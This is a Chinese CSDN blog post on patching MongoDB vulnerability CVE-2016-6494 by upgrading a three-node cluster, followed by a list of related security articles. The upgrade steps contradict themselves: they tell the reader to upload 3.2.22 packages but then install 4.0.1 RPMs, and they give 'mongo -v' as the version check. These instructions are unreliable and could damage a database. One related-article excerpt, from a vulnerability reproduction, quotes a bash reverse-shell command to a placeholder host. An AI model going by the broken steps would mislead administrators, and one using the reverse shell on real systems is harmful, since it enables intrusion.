修复MongoDB 安全漏洞(CVE-2016-6494)

最新推荐文章于 2024-08-14 10:38:26 发布
最新推荐文章于 2024-08-14 10:38:26 发布
阅读量2.3k 收藏 1
点赞数
分类专栏: 运维 数据库 MongoDB 文章标签: mongodb 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44848382/article/details/122996592
版权
运维 同时被 3 个专栏收录
27 篇文章 0 订阅
订阅专栏
MongoDB
6 篇文章 0 订阅
订阅专栏
数据库
4 篇文章 0 订阅
订阅专栏
本文档详细介绍了如何解决MongoDB的安全漏洞CVE-2016-6494,建议将MongoDB升级到3.2.22版本。升级过程包括数据备份、升级包上传、执行升级命令及验证升级结果,并提醒在升级后进行业务测试。确保所有服务器逐一升级以避免影响服务。
摘要由CSDN通过智能技术生成

MongoDB 安全漏洞(CVE-2016-6494)


绿盟漏扫扫到了mongodb漏洞 在这里插入图片描述
解决方案:

可以考虑把mongodb升级到3.2的最新版本,参考:
mongodb升级包下载:
https://repo.mongodb.org/yum/redhat/7/mongodb-org/3.2/x86_64/RPMS/
可以升级到3.2.22

升级步骤:
1、提前备份mongodb集群数据
登录mongodb集群中任一一台服务器上执行下面命令进行备份:
备份数据库:
mongodump -h 127.0.0.1:27017 --archive=/home/mongodb/xxxxxxx.gz --gzip -d xxxxx -u xxxxx -p xxxxxx
#-d:指定数据库名称
#-u:指定用户名
#-p:指定用户名密码

其中备份存放路径/home/mongodb可自行修改
2、上传升级包
上传更新包到服务器
mongodb-org-server-3.2.22-1.el7.x86_64.rpm
mongodb-org-shell-3.2.22-1.el7.x86_64.rpm
mongodb-org-tools-3.2.22-1.el7.x86_64.rpm
3、开始升级
升级前检查版本:
mongo -v 
在每一台服务器上执行下面命令进行升级:
cd /home
rpm -Uvh mongodb-org-server-4.0.1-1.el7.x86_64.rpm
rpm -Uvh mongodb-org-tools-4.0.1-1.el7.x86_64.rpm
rpm -Uvh mongodb-org-shell-4.0.1-1.el7.x86_64.rpm
升级完成后检查版本:
mongo -v
重启Mongodb:
systemctl daemon-reload
systemctl start mongod

一台升级完成后,再继续升级另外一台,直到三台都升级完成。
4、升级后测试
升级完成后进行业务测试
若不支持,则需要修改代码和更新mongodb-driver-...jar驱动包。
_最爱吃兽奶
关注
专栏目录
Spring Data MongoDB SpEL表达式注入漏洞(CVE-2022-22980)分析与利用
不忘初心,护天下安全!
06-24 2088
Spring Data for MongoDB是 Spring Data 项目的一部分,该项目旨在为新的数据存储提供熟悉和一致的基于Spring的编程模型,同时保留存储的特定特征和功能。 6月20日,VMware发布安全公告,修复了Spring Data MongoDB中的一个SpEL 表达式注入漏洞(CVE-2022-22980),该漏洞的CVSSv3评分为8.2。 Spring Data MongoDB应用程序在对包含查询参数占位符的SpEL表达式使用@Query或@Aggr
CVE-2022-38817
初岄的博客
10-12 2148
Dapr Dashboard 存在 未授权访问漏洞,在未经授权的情况下获取云上redis、mongodb、rabbitmq等应用的明文配置信息,并可以进一步利用这些配置信息获取云上的敏感数据。
MongoDB未授权访问漏洞验证与修复过程
心想事成
12-29 3916
Windows环境下快速修复mongodb未授权
MongoDB 权限提升安全漏洞
weixin_34216107的博客
07-02 561
mongodb 可以通过 readOnly 参数建立只读和可以读写的用户。但是只读用户也可以访问 db.system.user,所以可以拿到所有用户的密码的 hash 值。按照协议,只需要传递这个 hash ,而不用知道密码就能通过认证。所以,只读用户就可以由此获取可写的权限。 如: > db.system.users.find() { "_id" : ObjectId("4fd068ae3...
数据库安全:MongoDB 未授权访问漏洞.(27017端口)
网络安全领域___专研者.
07-30 764
MongoDB是一个高性能的 NoSQL 数据库,它默认情况下不设置认证机制,这可能导致未授权访问漏洞。如果MongoDB服务在没有配置任何安全措施的情况下启动,任何用户都可以通过默认端口对数据库进行操作,包括增、删、改、查等高危动作,且可以远程访问数据库.
MongoDB数据库安全漏洞,导致Family Locator泄露二十多万名用户数据
Enmotech的博客
09-04 907
摘要:本月第二次,未受保护的MongoDB数据库因大量安全漏洞而导致敏感信息泄露,受欢迎的家庭跟踪应用程序Family Locator已经暴露了超过238,000名用户的...
mongodb-els-memcached安全漏洞
bozhubing0375的博客
07-25 239
ElasticSearch漏洞 漏洞代码:CVE-2014-3120 命令执行CVE-2015-3337 目录穿越 CVE-2014-3120 命令执行 漏洞环境下载:https://github.com/vulhub/vulhub/tree/master/elasticsearch 启动: docker-compose builddocker-compose up -d CVE-...
mongodb漏洞批量扫描工具
weixin_34221775的博客
07-19 462
更多安全相关的内容:http://www.codefrom.com/u/%E8%A5%BF%E4%BA%8C%E6%97%97%E5%89%91%E5%AE%A... 环境依赖 easy_install pymongo 安装方法 git clone https://github.com/insightglacier/V...
Apache Tomcat 信息泄露漏洞CVE-2024-21733、CVE-2024-24549和CVE-2024-34750排查处理
最新发布
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
08-14 4129
现场的为中小型项目,未直接使用功能tomcat作为容器使用,仅是jar包里spring-boor框架引入tomcat 内嵌到 web项目中作为web server使用,从而保证项目包可直接运行 webapp项目,无需再部署到额外的tomcat服务了;当不想因为Tomcat就改变SpringBoot的版本时,可以采用排除SpringBoot中的Tomcat包,然后手动指定新的Tomcat的版本来实现升级内置组件的目的,当然还要引入Tomcat相关的包。其中,Coyote作为Tomcat的。
CVE-2023-38408漏洞修复--openssh&openssl升级
m0_61369275的博客
04-07 622
为了做好运维面试路上的助攻手,特整理了上百道。
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 989
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
ElasticSearch漏洞 && Mongodb漏洞 && Mongodb漏洞
CN_SHzhaoyujie的博客
12-04 345
ElasticSearch漏洞 && Mongodb漏洞 && Mongodb漏洞 ElasticSearch漏洞 漏洞环境下载: https://github.com/vulhub/vulhub/tree/master/elasticsearch 启动: docker-compose build docker-compose up -d CVE-2014-312...
CVE-2022-48282 MongoDB .NET/C# 驱动存在反序列化漏洞
murphysec的博客
02-23 685
MongoDB .NET/C# 驱动用于将 .NET 应用程序连接到 MongoDB 集群并建立通信,并使用 _t 字段鉴别属性名称。 MongoDB .NET/C# 驱动 2.19.0 之前版本存在反序列化漏洞,对于用 C# 编写的应用程序,攻击者满足以下条件时可利用此漏洞远程执行任意代码,并造成拒绝服务:
mongodb、tomcat、activemq漏洞修复
weixin_45552215的博客
04-17 1202
将后边的--bind_ip_all --auth修改成--bind_ip 127.0.0.1。Mongodb Server 输入验证错误漏洞(CVE-2021-20330);MongoDB Server 日志条目错误漏洞(CVE-2021-20333);Mongodb Server 输入验证错误漏洞(CVE-2021-20330);Mongodb Server 缓冲区错误漏洞(CVE-2020-7928);Mongodb Server 缓冲区错误漏洞(CVE-2020-7928);
MongoDB升级-从3.2到4.0心路历程
qq_25163313的博客
12-28 3286
前言 本次升级是2019年12月底完成. 升级过程中发现百度到的内容十分有限, 大部分时候都是翻看官方文档. 因此考虑写一篇文章帮助后来者. 本文仅供需要尝鲜的用户/企业做一个参考. 如有错误, 请指正. 本文为原创文章, 转载请注明出处. 升级工作 MongoDB Driver版本: 查询mongo的官方文档, 发现需要升级到3.12.0以上 <dependency> &...
MongoDB未授权访问漏洞复现及加固
weixin_43061533的博客
12-15 2987
0x01 漏洞简述 MongoDB是一个介于关系数据库和非关系数据库之间的产品,是非关系数据库当中功能最丰富,最像关系数据库的。它支持的数据结构非常松散,是类似json的bson格式,因此可以存储比较复杂的数据类型。Mongo最大的特点是它支持的查询语言非常强大,其语法有点类似于面向对象的查询语言,几乎可以实现类似关系数据库单表查询的绝大部分功能,而且还支持对数据建立索引。MongoDB服务安装后,默认未开启权限验证。如果服务监听在0.0.0.0,则可远程无需授权访问数据库。 0x02 风险等级 严漏
绿盟漏扫系统漏洞及修复方案
DEFT1998的博客
02-19 9897
绿盟漏扫系统漏洞及修复方案 漏洞1 详细描述: 1.X-Content-Type-Options HTTP 消息头相当于一个提示标志,被服务器用来提示客户端一定要遵循在 Content-Type 首部中对 MIME 类型 的设定,而不能对其进行修改。这就禁用了客户端的 MIME 类型嗅探行为,换句话说,也就是意味着网站管理员确定自己的设置没有问题。X-Content-Type-Options响应头的缺失使得目标URL更易遭受跨站脚本攻击。 2.HTTP X-XSS-Protection 响应头是 Inte
Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977)
EC_Carrot的博客
08-02 716
漏洞简介 Pivotal Spring Security OAuth 2.0.0版本至2.0.9版本和1.0.0版本至1.0.5版本中存在安全漏洞。远程攻击者可通过为‘response_type’参数制作值利用该漏洞执行代码。 漏洞复现 我们来进行反弹shell的操作,首先将bash命令进行编码: bash -i >& /dev/tcp/your-ip/9999 0>&1 我这里使用的是vulhub的环境,环境内有一个poc.py,用python3运行该脚本后,会让你输入字符
SpringSecurityOauth RCE (CVE-2016-4977) 分析与复现
weixin_33862514的博客
02-14 754
目录 0x00 前言 0x01 调试分析 0x02 补丁分析 0x03 参考 影响版本: 2.0.0-2.0.9 1.0.0-1.0.5 0x00 前言 这个漏洞与之前那个SpringBoot的SpEL表达式注入漏洞点基本一样,而且漏洞爆出来的时间点也差不多,可是...
MongoDB基础知识课程 - M001学习指南
课程包含了创建和部署Atlas集群的实践环节,并要求学生使用特定的用户名(m001-student)和密码(m001-mongodb-basics)来操作数据库。此外,课程内容可能涵盖MongoDB与SQL的对比、NoSQL的基本概念,以及如何使用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值